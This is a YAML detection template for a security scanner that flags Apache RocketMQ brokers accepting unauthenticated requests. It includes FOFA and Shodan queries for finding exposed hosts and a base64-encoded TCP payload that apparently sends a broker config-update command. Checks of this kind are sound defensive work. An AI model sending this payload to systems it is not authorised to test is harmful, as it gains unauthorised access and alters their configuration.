id: rocketmq-broker-unauth

info:
  name: RocketMQ broker unauthorized
  author: xpoc,j4vaovo
  severity: high
  verified: true
  description: |
    Apache Rocketmq Unauthenticated Access were detected.
    FOFA: protocol="rocketmq"
    SHODAN: title:"RocketMQ"
  reference:
    - https://rocketmq.apache.org/docs/bestPractice/03access
  tags: network,rocketmq,broker,apache,unauth
  created: 2023/06/22

set:
  hostname: request.url.host
  host: request.url.domain
  payload: base64Decode('AAAAyQAAALF7ImNvZGUiOjI1LCJleHRGaWVsZHMiOnsiQWNjZXNzS2V5Ijoicm9ja2V0bXEyIiwiU2lnbmF0dXJlIjoiK3pkUmRVdWF6aVNRa0hVVXFkcnR3ZzFGOGprPSJ9LCJmbGFnIjowLCJsYW5ndWFnZSI6IkpBVkEiLCJvcGFxdWUiOjAsInNlcmlhbGl6ZVR5cGVDdXJyZW50UlBDIjoiSlNPTiIsInZlcnNpb24iOjQzM310ZXN0X2tleT10ZXN0X3ZhbHVlCg==')
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
  r1:
    request:
      type: tcp
      host: "{{host}}:10911"
      data: "{{payload}}"
    expression: response.raw.bcontains(b'"code":0') && response.raw.bcontains(b'serializeTypeCurrentRPC')
expression: r0() || r1() 